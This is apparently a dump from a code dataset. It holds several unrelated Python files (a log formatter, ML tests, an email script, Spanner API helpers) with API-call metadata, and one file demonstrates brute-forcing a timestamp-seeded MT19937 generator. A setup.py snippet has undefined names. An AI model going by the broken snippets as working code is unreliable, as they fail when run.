] | [((330, 381), 'parentopticon.db.model.ColumnInteger', 'ColumnInteger', ([], {'autoincrement': '(True)', 'primary_key': '(True)'}), '(autoincrement=True, primary_key=True)\n', (343, 381), False, 'from parentopticon.db.model import ColumnInteger, ColumnText, Model\n'), ((395, 410), 'parentopticon.db.model.ColumnInteger', 'ColumnInteger', ([], {}), '()\n', (408, 410), False, 'from parentopticon.db.model import ColumnInteger, ColumnText, Model\n'), ((423, 444), 'parentopticon.db.model.ColumnText', 'ColumnText', ([], {'null': '(True)'}), '(null=True)\n', (433, 444), False, 'from parentopticon.db.model import ColumnInteger, ColumnText, Model\n')] |
# -*- coding: utf-8 -*-
"""The UTMPX binary file event formatter."""
from plaso.formatters import interface
from plaso.formatters import manager
from plaso.lib import errors
class UtmpxSessionFormatter(interface.ConditionalEventFormatter):
"""Formatter for an UTMPX session event."""
DATA_TYPE = u'mac:utmpx:event'
FORMAT_STRING_PIECES = [
u'User: {user}',
u'Status: {status}',
u'Computer Name: {computer_name}',
u'Terminal: {terminal}']
FORMAT_STRING_SHORT_PIECES = [u'User: {user}']
SOURCE_LONG = u'UTMPX session'
SOURCE_SHORT = u'LOG'
# 9, 10 and 11 are only for Darwin and IOS.
_STATUS_TYPES = {
0: u'EMPTY',
1: u'RUN_LVL',
2: u'BOOT_TIME',
3: u'OLD_TIME',
4: u'NEW_TIME',
5: u'INIT_PROCESS',
6: u'LOGIN_PROCESS',
7: u'USER_PROCESS',
8: u'DEAD_PROCESS',
9: u'ACCOUNTING',
10: u'SIGNATURE',
11: u'SHUTDOWN_TIME'}
def GetMessages(self, unused_formatter_mediator, event_object):
"""Determines the formatted message strings for an event object.
Args:
formatter_mediator: the formatter mediator object (instance of
FormatterMediator).
event_object: the event object (instance of EventObject).
Returns:
A tuple containing the formatted message string and short message string.
Raises:
WrongFormatter: if the event object cannot be formatted by the formatter.
"""
if self.DATA_TYPE != event_object.data_type:
raise errors.WrongFormatter(u'Unsupported data type: {0:s}.'.format(
event_object.data_type))
event_values = event_object.GetValues()
status_type = event_values.get(u'status_type', None)
if status_type is not None:
event_values[u'status'] = self._STATUS_TYPES.get(
status_type, u'{0:d}'.format(status_type))
else:
event_values[u'status'] = u'N/A'
return self._ConditionalFormatMessages(event_values)
manager.FormattersManager.RegisterFormatter(UtmpxSessionFormatter)
| [
"plaso.formatters.manager.FormattersManager.RegisterFormatter"
] | [((1969, 2035), 'plaso.formatters.manager.FormattersManager.RegisterFormatter', 'manager.FormattersManager.RegisterFormatter', (['UtmpxSessionFormatter'], {}), '(UtmpxSessionFormatter)\n', (2012, 2035), False, 'from plaso.formatters import manager\n')] |
import pytest
import numpy as np
from sklearn.datasets import load_iris
from numpy.testing import assert_array_equal
from numpy.testing import assert_allclose
from .._kdclassifier import KDClassifierRF
from .._RBFSamplerORF import RBFSamplerORF
from .._RBFSamplerSORF import RBFSamplerSORF
@pytest.fixture
def data():
return load_iris(return_X_y=True)
def test_KDClassifierRF(data):
X, y = data
clf = KDClassifierRF()
assert hasattr(clf, 'approx')
assert hasattr(clf, 'normalize')
assert hasattr(clf, 'gamma')
assert hasattr(clf, 'n_components')
for approx in ['rff+','rff', 'lrff', 'lrff+', 'exact']:
clf = KDClassifierRF(approx=approx)
clf.fit(X, y)
assert hasattr(clf, 'classes_')
assert hasattr(clf, 'Xtrain_')
if clf.approx != 'exact':
assert hasattr(clf, 'rbf_sampler_')
y_pred = clf.predict(X)
assert y_pred.shape == (X.shape[0],)
def test_KDClassifierORF(data):
X, y = data
for approx in ['rff+','rff', 'lrff', 'lrff+', 'exact']:
clf = KDClassifierRF(approx=approx, sampler=RBFSamplerORF())
clf.fit(X, y)
assert hasattr(clf, 'classes_')
assert hasattr(clf, 'Xtrain_')
if clf.approx != 'exact':
assert hasattr(clf, 'rbf_sampler_')
y_pred = clf.predict(X)
assert y_pred.shape == (X.shape[0],)
def test_KDClassifierSORF(data):
X, y = data
for approx in ['rff+','rff', 'lrff', 'lrff+', 'exact']:
clf = KDClassifierRF(approx=approx, sampler=RBFSamplerSORF())
clf.fit(X, y)
assert hasattr(clf, 'classes_')
assert hasattr(clf, 'Xtrain_')
if clf.approx != 'exact':
assert hasattr(clf, 'rbf_sampler_')
y_pred = clf.predict(X)
assert y_pred.shape == (X.shape[0],)
| [
"sklearn.datasets.load_iris"
] | [((333, 359), 'sklearn.datasets.load_iris', 'load_iris', ([], {'return_X_y': '(True)'}), '(return_X_y=True)\n', (342, 359), False, 'from sklearn.datasets import load_iris\n')] |
from itertools import cycle, islice
import re
distances = {}
for line in open('input.txt'):
m = re.match(r'(\w+) can fly (\d+) km/s for (\d+) seconds, '
r'but then must rest for (\d+) seconds.', line)
reindeer, speed, time, rest = m.groups()
distances[reindeer] = cycle([int(speed)] * int(time) + [0] * int(rest))
print(max(sum(islice(seconds, 0, 2503)) for seconds in distances.values()))
| [
"re.match",
"itertools.islice"
] | [((102, 215), 're.match', 're.match', (['"""(\\\\w+) can fly (\\\\d+) km/s for (\\\\d+) seconds, but then must rest for (\\\\d+) seconds."""', 'line'], {}), "(\n '(\\\\w+) can fly (\\\\d+) km/s for (\\\\d+) seconds, but then must rest for (\\\\d+) seconds.'\n , line)\n", (110, 215), False, 'import re\n'), ((360, 384), 'itertools.islice', 'islice', (['seconds', '(0)', '(2503)'], {}), '(seconds, 0, 2503)\n', (366, 384), False, 'from itertools import cycle, islice\n')] |
import datetime as dt
import pandas
import random
import smtplib
from astroid import Pass
MY_EMAIL = "your_email"
PASSWORD = "<PASSWORD>"
today = dt.datetime.now()
today_tuple = (today.month, today.day)
data = pandas.read_csv("birthdays.csv")
birthday_dict = {(data_row.month, data_row.day): data_row for (index, data_row) in data.iterrows()}
if today_tuple in birthday_dict:
birthday_person = birthday_dict[today_tuple]
file_path = f"letter_templates/letter_{random.randint(1, 3)}.txt"
with open(file_path) as letter:
contents = letter.read()
contents = contents.replace("[NAME]", birthday_person["name"])
with smtplib.SMTP_SSL("smtp.gmail.com") as connection:
connection.login(MY_EMAIL, PASSWORD)
connection.sendmail(from_addr=MY_EMAIL, to_addrs=birthday_person["email"], msg=f"Subject: Happy Birthday! \n\n"
f"{contents}") | [
"pandas.read_csv",
"smtplib.SMTP_SSL",
"datetime.datetime.now",
"random.randint"
] | [((149, 166), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (164, 166), True, 'import datetime as dt\n'), ((214, 246), 'pandas.read_csv', 'pandas.read_csv', (['"""birthdays.csv"""'], {}), "('birthdays.csv')\n", (229, 246), False, 'import pandas\n'), ((651, 685), 'smtplib.SMTP_SSL', 'smtplib.SMTP_SSL', (['"""smtp.gmail.com"""'], {}), "('smtp.gmail.com')\n", (667, 685), False, 'import smtplib\n'), ((474, 494), 'random.randint', 'random.randint', (['(1)', '(3)'], {}), '(1, 3)\n', (488, 494), False, 'import random\n')] |
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function)
import warnings
from math import exp
import numpy as np
def fit_factory(discard=1):
def fit(x, y):
p = np.polyfit(x, y, 1)
v = np.polyval(p, x)
e = np.abs(y - v)
drop_idxs = np.argsort(e)[-discard]
return np.polyfit(np.delete(x, drop_idxs),
np.delete(y, drop_idxs), 1)
return fit
def integrate_tolerance_series(odesys, atols, rtols, x, y0, params=(),
fit=lambda x, y: np.polyfit(x, y, 1), val=np.polyval, **kwargs):
"""
Parameters
----------
odesys : :class:`ODESys`
atols : array_like
Positive, monotonically increasing 1D array.
rtols : array_like
Positive, monotonically increasing 1D array.
x : array_like
Passed on to ``odesys.integrate`` for first set of tolerances.
(subsequent calls will use xout from first integration).
y0 : array_like
Passed on to ``odesys.integrate``.
params : array_like
Passed on to ``odesys.integrate``.
fit : callable
val : callable
\\*\\*kwargs:
Passed on to ``odesys.integrate``.
Returns
-------
result0 : Result
results : list of Result instances
extra : dict
errest : 2D array of error estimates for result0.yout
"""
if atols is None:
atols = rtols
if rtols is None:
rtols = atols
atols, rtols = map(np.asarray, (atols, rtols))
if atols.ndim != 1:
raise NotImplementedError("Assuming 1-dimensional array")
if atols.shape != rtols.shape:
raise ValueError("atols & rtols need to be of same length")
if 'atol' in kwargs or 'rtol' in kwargs:
raise ValueError("Neither atol nor rtol are allowed in kwargs")
if not np.all(atols > 0) or not np.all(rtols > 0):
raise ValueError("atols & rtols need to > 0")
if not np.all(np.diff(atols) > 0) or not np.all(np.diff(rtols) > 0):
raise ValueError("atols & rtols need to obey strict positive monotonicity")
if atols.size < 4:
raise ValueError("Pointless doing linear interpolation on less than 3 points")
if atols.size < 6:
warnings.warn("Statistics will be (very) shaky when doing linear "
"interpolation on less than 5 points.")
ntols = atols.size
result0 = odesys.integrate(x, y0, params, atol=atols[0], rtol=rtols[0], **kwargs)
results = [odesys.integrate(result0.xout, y0, params, atol=atols[i], rtol=rtols[i], **kwargs)
for i in range(1, ntols)]
errest = []
for ix, vx in enumerate(result0.xout):
diffs = np.array([result0.yout[ix, :] - r.yout[ix, :] for r in results])
tols = np.array([atol + rtol*np.abs(r.yout[ix, :]) for r, atol, rtol in
zip([result0] + results, atols, rtols)])
ln_tols = np.log(tols).astype(np.float64)
ln_absd = np.log(np.abs(diffs)).astype(np.float64)
yerrs = []
for iy in range(result0.yout.shape[-1]):
if np.all(diffs[:, iy] == 0):
yerrs.append(0)
else:
p = fit(ln_tols[1:, iy], ln_absd[:, iy])
yerrs.append(exp(val(p, ln_tols[0, iy])))
errest.append(yerrs)
return result0, results, {'errest': np.array(errest)}
| [
"numpy.abs",
"numpy.log",
"numpy.polyfit",
"numpy.polyval",
"numpy.argsort",
"numpy.diff",
"numpy.array",
"warnings.warn",
"numpy.delete",
"numpy.all"
] | [((210, 229), 'numpy.polyfit', 'np.polyfit', (['x', 'y', '(1)'], {}), '(x, y, 1)\n', (220, 229), True, 'import numpy as np\n'), ((242, 258), 'numpy.polyval', 'np.polyval', (['p', 'x'], {}), '(p, x)\n', (252, 258), True, 'import numpy as np\n'), ((271, 284), 'numpy.abs', 'np.abs', (['(y - v)'], {}), '(y - v)\n', (277, 284), True, 'import numpy as np\n'), ((570, 589), 'numpy.polyfit', 'np.polyfit', (['x', 'y', '(1)'], {}), '(x, y, 1)\n', (580, 589), True, 'import numpy as np\n'), ((2252, 2365), 'warnings.warn', 'warnings.warn', (['"""Statistics will be (very) shaky when doing linear interpolation on less than 5 points."""'], {}), "(\n 'Statistics will be (very) shaky when doing linear interpolation on less than 5 points.'\n )\n", (2265, 2365), False, 'import warnings\n'), ((2704, 2770), 'numpy.array', 'np.array', (['[(result0.yout[ix, :] - r.yout[ix, :]) for r in results]'], {}), '([(result0.yout[ix, :] - r.yout[ix, :]) for r in results])\n', (2712, 2770), True, 'import numpy as np\n'), ((305, 318), 'numpy.argsort', 'np.argsort', (['e'], {}), '(e)\n', (315, 318), True, 'import numpy as np\n'), ((355, 378), 'numpy.delete', 'np.delete', (['x', 'drop_idxs'], {}), '(x, drop_idxs)\n', (364, 378), True, 'import numpy as np\n'), ((406, 429), 'numpy.delete', 'np.delete', (['y', 'drop_idxs'], {}), '(y, drop_idxs)\n', (415, 429), True, 'import numpy as np\n'), ((1856, 1873), 'numpy.all', 'np.all', (['(atols > 0)'], {}), '(atols > 0)\n', (1862, 1873), True, 'import numpy as np\n'), ((1881, 1898), 'numpy.all', 'np.all', (['(rtols > 0)'], {}), '(rtols > 0)\n', (1887, 1898), True, 'import numpy as np\n'), ((3107, 3132), 'numpy.all', 'np.all', (['(diffs[:, iy] == 0)'], {}), '(diffs[:, iy] == 0)\n', (3113, 3132), True, 'import numpy as np\n'), ((3368, 3384), 'numpy.array', 'np.array', (['errest'], {}), '(errest)\n', (3376, 3384), True, 'import numpy as np\n'), ((2933, 2945), 'numpy.log', 'np.log', (['tols'], {}), '(tols)\n', (2939, 2945), True, 'import numpy as np\n'), ((1972, 1986), 'numpy.diff', 'np.diff', (['atols'], {}), '(atols)\n', (1979, 1986), True, 'import numpy as np\n'), ((2006, 2020), 'numpy.diff', 'np.diff', (['rtols'], {}), '(rtols)\n', (2013, 2020), True, 'import numpy as np\n'), ((2990, 3003), 'numpy.abs', 'np.abs', (['diffs'], {}), '(diffs)\n', (2996, 3003), True, 'import numpy as np\n'), ((2806, 2827), 'numpy.abs', 'np.abs', (['r.yout[ix, :]'], {}), '(r.yout[ix, :])\n', (2812, 2827), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
# Learn more: https://github.com/kennethreitz/setup.py
import os, sys
from setuptools import setup, find_packages
def read_requirements() -> List:
"""Parse requirements from requirements.txt."""
reqs_path = os.path.join('.', 'requirements.txt')
with open(reqs_path, 'r') as f:
requirements = [line.rstrip() for line in f]
return requirements
setup(
name='sample',
version='0.1.0',
description='Sample package for Python-Guide.org',
long_description=readme,
author='<NAME>',
author_email='<EMAIL>',
install_requires=read_requirements(),
url='test',
license=license,
packages=find_packages(exclude=('tests', 'docs'))
)
| [
"os.path.join",
"setuptools.find_packages"
] | [((242, 279), 'os.path.join', 'os.path.join', (['"""."""', '"""requirements.txt"""'], {}), "('.', 'requirements.txt')\n", (254, 279), False, 'import os, sys\n'), ((667, 707), 'setuptools.find_packages', 'find_packages', ([], {'exclude': "('tests', 'docs')"}), "(exclude=('tests', 'docs'))\n", (680, 707), False, 'from setuptools import setup, find_packages\n')] |
from flatpak_indexer.models import FlatpakBuildModel, ImageModel, ImageBuildModel, RegistryModel
IMAGE1 = {
"Annotations": {"key1": "value1"},
"Architecture": "amd64",
"Digest": "sha256:baabaa",
"Labels": {"key2": "value2"},
"MediaType": "application/vnd.docker.distribution.manifest.v2+json",
"OS": "linux",
"Tags": ["tag1"],
'PullSpec': 'candidate-registry.fedoraproject.org/baobab@sha256:12345'
}
IMAGE2 = {
"Annotations": {"key1": "value1"},
"Architecture": "ppc64le",
"Digest": "sha256:beebee",
"Labels": {"key2": "value2"},
"MediaType": "application/vnd.docker.distribution.manifest.v2+json",
"OS": "linux",
"Tags": ["tag2"]
}
LIST1 = {
"Digest": "sha256:booboo",
"MediaType": "application/vnd.docker.distribution.manifest.list.v2+json",
"Images": [IMAGE1, IMAGE2],
"Tags": ["latest"],
}
REGISTRY = {
"Repositories": [
{
"Name": "aisleriot",
"Images": [
IMAGE1,
IMAGE2,
],
"Lists": [
LIST1
],
}
]
}
IMAGE_BUILD = {
'BuildId': 12345,
'Nvr': 'testrepo-1.2.3-1',
'Source': 'git://src.fedoraproject.org/flatpaks/baobab#BAOBAB_GIT_DIGEST',
'CompletionTime': '2020-07-31T16:26:22+00:00',
'UserName': 'jdoe',
'Images': [IMAGE1]
}
FLATPAK_BUILD = {
'BuildId': 12345,
'Nvr': 'testrepo-1.2.3-1',
'Source': 'git://src.fedoraproject.org/flatpaks/baobab#BAOBAB_GIT_DIGEST',
'CompletionTime': '2020-07-31T16:26:22+00:00',
'UserName': 'jdoe',
'Images': [IMAGE1],
'ModuleBuilds': ['baobab-1.2.3-3020190603102507'],
'PackageBuilds': ['baobab-1.2.3-1'],
}
def test_registry_model():
model = RegistryModel.from_json(REGISTRY)
json = model.to_json()
assert json == REGISTRY
def test_registry_model_add_image():
model = RegistryModel.from_json(REGISTRY)
image = ImageModel.from_json(IMAGE1)
model.add_image('aisleriot2', image)
assert model.repositories['aisleriot2'].images[image.digest] == image
def test_image_build_repository():
image = ImageBuildModel.from_json(IMAGE_BUILD)
assert image.repository == 'baobab'
def test_image_build_from_json():
image = ImageBuildModel.from_json(IMAGE_BUILD)
assert isinstance(image, ImageBuildModel)
flatpak = ImageBuildModel.from_json(FLATPAK_BUILD)
assert isinstance(flatpak, FlatpakBuildModel)
| [
"flatpak_indexer.models.ImageBuildModel.from_json",
"flatpak_indexer.models.RegistryModel.from_json",
"flatpak_indexer.models.ImageModel.from_json"
] | [((1756, 1789), 'flatpak_indexer.models.RegistryModel.from_json', 'RegistryModel.from_json', (['REGISTRY'], {}), '(REGISTRY)\n', (1779, 1789), False, 'from flatpak_indexer.models import FlatpakBuildModel, ImageModel, ImageBuildModel, RegistryModel\n'), ((1897, 1930), 'flatpak_indexer.models.RegistryModel.from_json', 'RegistryModel.from_json', (['REGISTRY'], {}), '(REGISTRY)\n', (1920, 1930), False, 'from flatpak_indexer.models import FlatpakBuildModel, ImageModel, ImageBuildModel, RegistryModel\n'), ((1944, 1972), 'flatpak_indexer.models.ImageModel.from_json', 'ImageModel.from_json', (['IMAGE1'], {}), '(IMAGE1)\n', (1964, 1972), False, 'from flatpak_indexer.models import FlatpakBuildModel, ImageModel, ImageBuildModel, RegistryModel\n'), ((2138, 2176), 'flatpak_indexer.models.ImageBuildModel.from_json', 'ImageBuildModel.from_json', (['IMAGE_BUILD'], {}), '(IMAGE_BUILD)\n', (2163, 2176), False, 'from flatpak_indexer.models import FlatpakBuildModel, ImageModel, ImageBuildModel, RegistryModel\n'), ((2265, 2303), 'flatpak_indexer.models.ImageBuildModel.from_json', 'ImageBuildModel.from_json', (['IMAGE_BUILD'], {}), '(IMAGE_BUILD)\n', (2290, 2303), False, 'from flatpak_indexer.models import FlatpakBuildModel, ImageModel, ImageBuildModel, RegistryModel\n'), ((2365, 2405), 'flatpak_indexer.models.ImageBuildModel.from_json', 'ImageBuildModel.from_json', (['FLATPAK_BUILD'], {}), '(FLATPAK_BUILD)\n', (2390, 2405), False, 'from flatpak_indexer.models import FlatpakBuildModel, ImageModel, ImageBuildModel, RegistryModel\n')] |
import time
import random
from MT19937 import seed_mt
from MT19937 import extract_number
def delay( seconds ): #delay thì Ctrl + C được, còn time.sleep() thì không
start = time.time()
while time.time() - start < seconds:
pass
def main():
start_time = time.time()
print('Pending...')
delay(random.randint(40,1000))
timestamp = int(time.time())
seed_mt(timestamp)
rand = extract_number()
delay(random.randint(40,1000))
print('\nFirst output of the RNG: ' + str(rand))
print('\nNow I will try to discover the seed the program has taken')
print('given the fact that I know it used MT19937!')
print('\nNow cracking...')
test = int(time.time())
seed_mt(test)
first = extract_number()
while first != rand:
test -= 1
seed_mt(test)
first = extract_number()
print('Haha, the time seed is ' + str(test) + ', isn\'t it?')
if test == timestamp:
print('Congratulation! You have broken my super-insecure randomness using timestamp!')
else:
print('Huh? That\'s all you have? The real timestamp is ' + str(timestamp))
print('Poor you.')
time_elapsed = time.time() - start_time
print('Time elapsed: ' + str(time_elapsed))
if __name__ == '__main__':
main()
| [
"MT19937.extract_number",
"random.randint",
"MT19937.seed_mt",
"time.time"
] | [((185, 196), 'time.time', 'time.time', ([], {}), '()\n', (194, 196), False, 'import time\n'), ((286, 297), 'time.time', 'time.time', ([], {}), '()\n', (295, 297), False, 'import time\n'), ((400, 418), 'MT19937.seed_mt', 'seed_mt', (['timestamp'], {}), '(timestamp)\n', (407, 418), False, 'from MT19937 import seed_mt\n'), ((431, 447), 'MT19937.extract_number', 'extract_number', ([], {}), '()\n', (445, 447), False, 'from MT19937 import extract_number\n'), ((741, 754), 'MT19937.seed_mt', 'seed_mt', (['test'], {}), '(test)\n', (748, 754), False, 'from MT19937 import seed_mt\n'), ((768, 784), 'MT19937.extract_number', 'extract_number', ([], {}), '()\n', (782, 784), False, 'from MT19937 import extract_number\n'), ((336, 360), 'random.randint', 'random.randint', (['(40)', '(1000)'], {}), '(40, 1000)\n', (350, 360), False, 'import random\n'), ((382, 393), 'time.time', 'time.time', ([], {}), '()\n', (391, 393), False, 'import time\n'), ((459, 483), 'random.randint', 'random.randint', (['(40)', '(1000)'], {}), '(40, 1000)\n', (473, 483), False, 'import random\n'), ((723, 734), 'time.time', 'time.time', ([], {}), '()\n', (732, 734), False, 'import time\n'), ((839, 852), 'MT19937.seed_mt', 'seed_mt', (['test'], {}), '(test)\n', (846, 852), False, 'from MT19937 import seed_mt\n'), ((870, 886), 'MT19937.extract_number', 'extract_number', ([], {}), '()\n', (884, 886), False, 'from MT19937 import extract_number\n'), ((1231, 1242), 'time.time', 'time.time', ([], {}), '()\n', (1240, 1242), False, 'import time\n'), ((208, 219), 'time.time', 'time.time', ([], {}), '()\n', (217, 219), False, 'import time\n')] |
from praline.client.project.pipeline.stage_resources import StageResources
from praline.client.project.pipeline.stages.stage import stage
from praline.client.repository.remote_proxy import RemoteProxy
from praline.common.file_system import FileSystem, join
from typing import Any, Dict
clang_format_style_file_contents = """\
Language: Cpp
AccessModifierOffset: -4
AlignTrailingComments: true
AllowShortBlocksOnASingleLine: false
AllowShortFunctionsOnASingleLine: None
AlwaysBreakTemplateDeclarations: true
BreakBeforeBraces: Allman
ColumnLimit: 120
ConstructorInitializerAllOnOneLineOrOnePerLine: true
FixNamespaceComments: false
IndentWidth: 4
PointerAlignment: Left
ReflowComments: true
SortIncludes: true
SortUsingDeclarations: true
SpaceAfterTemplateKeyword: false
SpacesInAngles: false
UseTab: Never
"""
class ClangFormatConfigurationError(Exception):
pass
def predicate(file_system: FileSystem, program_arguments: Dict[str, Any], configuration: Dict[str, Any]):
return not program_arguments['global']['skip_formatting']
@stage(requirements=[['project_directory']],
output=['clang_format_style_file', 'clang_format_executable'],
predicate=predicate)
def load_clang_format(file_system: FileSystem, resources: StageResources, cache: Dict[str, Any], program_arguments: Dict[str, Any], configuration: Dict[str, Any], remote_proxy: RemoteProxy):
if 'clang-format-executable-path' in configuration:
clang_format_executable = configuration['clang-format-executable-path']
if not file_system.is_file(clang_format_executable):
raise ClangFormatConfigurationError(f"user supplied clang-format '{clang_format_executable}' is not a file")
else:
clang_format_executable = file_system.which('clang-format')
if clang_format_executable is None:
raise ClangFormatConfigurationError("coudn't find clang-format in path -- either supply it in the praline-client.config file or add it to the path environment variable")
project_directory = resources['project_directory']
resources['clang_format_executable'] = clang_format_executable
resources['clang_format_style_file'] = clang_format_style_file = join(project_directory, '.clang-format')
file_system.create_file_if_missing(clang_format_style_file, clang_format_style_file_contents)
| [
"praline.common.file_system.join",
"praline.client.project.pipeline.stages.stage.stage"
] | [((1044, 1176), 'praline.client.project.pipeline.stages.stage.stage', 'stage', ([], {'requirements': "[['project_directory']]", 'output': "['clang_format_style_file', 'clang_format_executable']", 'predicate': 'predicate'}), "(requirements=[['project_directory']], output=[\n 'clang_format_style_file', 'clang_format_executable'], predicate=predicate)\n", (1049, 1176), False, 'from praline.client.project.pipeline.stages.stage import stage\n'), ((2195, 2235), 'praline.common.file_system.join', 'join', (['project_directory', '""".clang-format"""'], {}), "(project_directory, '.clang-format')\n", (2199, 2235), False, 'from praline.common.file_system import FileSystem, join\n')] |
import unittest
from kalliope.core.NeuronModule import MissingParameterException
from kalliope.neurons.slack.slack import Slack
class TestSlack(unittest.TestCase):
def setUp(self):
self.slack_token="<PASSWORD>"
self.channel = "kalliochannel"
self.message = "kalliomessage"
def testParameters(self):
def run_test(parameters_to_test):
with self.assertRaises(MissingParameterException):
Slack(**parameters_to_test)
# empty
parameters = dict()
run_test(parameters)
# missing message
parameters = {
"slack_token": self.slack_token,
"channel": self.channel,
}
run_test(parameters)
# missing slack_token
parameters = {
"channel": self.channel,
"message": self.message
}
run_test(parameters)
# missing channel
parameters = {
"slack_token": self.slack_token,
"message": self.message
}
run_test(parameters) | [
"kalliope.neurons.slack.slack.Slack"
] | [((457, 484), 'kalliope.neurons.slack.slack.Slack', 'Slack', ([], {}), '(**parameters_to_test)\n', (462, 484), False, 'from kalliope.neurons.slack.slack import Slack\n')] |
# -*- coding: utf-8 -*- #
# Copyright 2016 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Spanner instanceConfigs API helper."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from apitools.base.py import list_pager
from googlecloudsdk.api_lib.util import apis
from googlecloudsdk.command_lib.ai import errors
from googlecloudsdk.command_lib.util.args import labels_util
from googlecloudsdk.core import properties
from googlecloudsdk.core import resources
import six
def Get(config):
"""Get the specified instance config."""
client = apis.GetClientInstance('spanner', 'v1')
msgs = apis.GetMessagesModule('spanner', 'v1')
ref = resources.REGISTRY.Parse(
config,
params={'projectsId': properties.VALUES.core.project.GetOrFail},
collection='spanner.projects.instanceConfigs')
req = msgs.SpannerProjectsInstanceConfigsGetRequest(
name=ref.RelativeName())
return client.projects_instanceConfigs.Get(req)
def List():
"""List instance configs in the project."""
client = apis.GetClientInstance('spanner', 'v1')
msgs = apis.GetMessagesModule('spanner', 'v1')
req = msgs.SpannerProjectsInstanceConfigsListRequest(
parent='projects/'+properties.VALUES.core.project.GetOrFail())
return list_pager.YieldFromList(
client.projects_instanceConfigs,
req,
field='instanceConfigs',
batch_size_attribute='pageSize')
def Delete(config, etag=None, validate_only=False):
"""Delete an instance config."""
client = apis.GetClientInstance('spanner', 'v1')
msgs = apis.GetMessagesModule('spanner', 'v1')
ref = resources.REGISTRY.Parse(
config,
params={'projectsId': properties.VALUES.core.project.GetOrFail},
collection='spanner.projects.instanceConfigs')
req = msgs.SpannerProjectsInstanceConfigsDeleteRequest(
name=ref.RelativeName(), etag=etag, validateOnly=validate_only)
return client.projects_instanceConfigs.Delete(req)
def Create(config,
display_name,
base_config,
replicas,
validate_only,
labels=None,
etag=None):
"""Create instance configs in the project."""
client = apis.GetClientInstance('spanner', 'v1')
msgs = apis.GetMessagesModule('spanner', 'v1')
project_ref = resources.REGISTRY.Create(
'spanner.projects', projectsId=properties.VALUES.core.project.GetOrFail)
config_ref = resources.REGISTRY.Parse(
config,
params={'projectsId': properties.VALUES.core.project.GetOrFail},
collection='spanner.projects.instanceConfigs')
replica_info = []
for replica in replicas:
# TODO(b/399093071): Change type to ReplicaInfo.TypeValueValuesEnum instead
# of str.
replica_type = msgs.ReplicaInfo.TypeValueValuesEnum.TYPE_UNSPECIFIED
if replica['type'] == 'READ_ONLY':
replica_type = msgs.ReplicaInfo.TypeValueValuesEnum.READ_ONLY
elif replica['type'] == 'READ_WRITE':
replica_type = msgs.ReplicaInfo.TypeValueValuesEnum.READ_WRITE
elif replica['type'] == 'WITNESS':
replica_type = msgs.ReplicaInfo.TypeValueValuesEnum.WITNESS
replica_info.append(
msgs.ReplicaInfo(location=replica['location'], type=replica_type))
# TODO(b/399093071): Implement --replicas-file option.
labels_message = {}
if labels is not None:
labels_message = msgs.InstanceConfig.LabelsValue(additionalProperties=[
msgs.InstanceConfig.LabelsValue.AdditionalProperty(
key=key, value=value) for key, value in six.iteritems(labels)
])
instance_config = msgs.InstanceConfig(
name=config_ref.RelativeName(),
displayName=display_name,
baseConfig=base_config,
labels=labels_message,
replicas=replica_info)
if etag:
instance_config.etag = etag
req = msgs.SpannerProjectsInstanceConfigsCreateRequest(
parent=project_ref.RelativeName(),
instanceConfigId=config,
instanceConfig=instance_config,
validateOnly=validate_only)
return client.projects_instanceConfigs.Create(req)
def Patch(args):
"""Update an instance config."""
client = apis.GetClientInstance('spanner', 'v1')
msgs = apis.GetMessagesModule('spanner', 'v1')
ref = resources.REGISTRY.Parse(
args.config,
params={'projectsId': properties.VALUES.core.project.GetOrFail},
collection='spanner.projects.instanceConfigs')
instance_config = msgs.InstanceConfig(name=ref.RelativeName())
update_mask = []
if args.display_name is not None:
instance_config.displayName = args.display_name
update_mask.append('display_name')
if args.etag is not None:
instance_config.etag = args.etag
def GetLabels():
req = msgs.SpannerProjectsInstanceConfigsGetRequest(name=ref.RelativeName())
return client.projects_instanceConfigs.Get(req).labels
labels_update = labels_util.ProcessUpdateArgsLazy(
args, msgs.InstanceConfig.LabelsValue, GetLabels)
if labels_update.needs_update:
instance_config.labels = labels_update.labels
update_mask.append('labels')
if not update_mask:
raise errors.NoFieldsSpecifiedError('No updates requested.')
req = msgs.SpannerProjectsInstanceConfigsPatchRequest(
name=ref.RelativeName(),
instanceConfig=instance_config,
updateMask=','.join(update_mask),
validateOnly=args.validate_only)
return client.projects_instanceConfigs.Patch(req)
| [
"six.iteritems",
"googlecloudsdk.command_lib.util.args.labels_util.ProcessUpdateArgsLazy",
"googlecloudsdk.api_lib.util.apis.GetClientInstance",
"googlecloudsdk.core.properties.VALUES.core.project.GetOrFail",
"googlecloudsdk.core.resources.REGISTRY.Parse",
"apitools.base.py.list_pager.YieldFromList",
"googlecloudsdk.command_lib.ai.errors.NoFieldsSpecifiedError",
"googlecloudsdk.core.resources.REGISTRY.Create",
"googlecloudsdk.api_lib.util.apis.GetMessagesModule"
] | [((1140, 1179), 'googlecloudsdk.api_lib.util.apis.GetClientInstance', 'apis.GetClientInstance', (['"""spanner"""', '"""v1"""'], {}), "('spanner', 'v1')\n", (1162, 1179), False, 'from googlecloudsdk.api_lib.util import apis\n'), ((1189, 1228), 'googlecloudsdk.api_lib.util.apis.GetMessagesModule', 'apis.GetMessagesModule', (['"""spanner"""', '"""v1"""'], {}), "('spanner', 'v1')\n", (1211, 1228), False, 'from googlecloudsdk.api_lib.util import apis\n'), ((1237, 1386), 'googlecloudsdk.core.resources.REGISTRY.Parse', 'resources.REGISTRY.Parse', (['config'], {'params': "{'projectsId': properties.VALUES.core.project.GetOrFail}", 'collection': '"""spanner.projects.instanceConfigs"""'}), "(config, params={'projectsId': properties.VALUES.\n core.project.GetOrFail}, collection='spanner.projects.instanceConfigs')\n", (1261, 1386), False, 'from googlecloudsdk.core import resources\n'), ((1608, 1647), 'googlecloudsdk.api_lib.util.apis.GetClientInstance', 'apis.GetClientInstance', (['"""spanner"""', '"""v1"""'], {}), "('spanner', 'v1')\n", (1630, 1647), False, 'from googlecloudsdk.api_lib.util import apis\n'), ((1657, 1696), 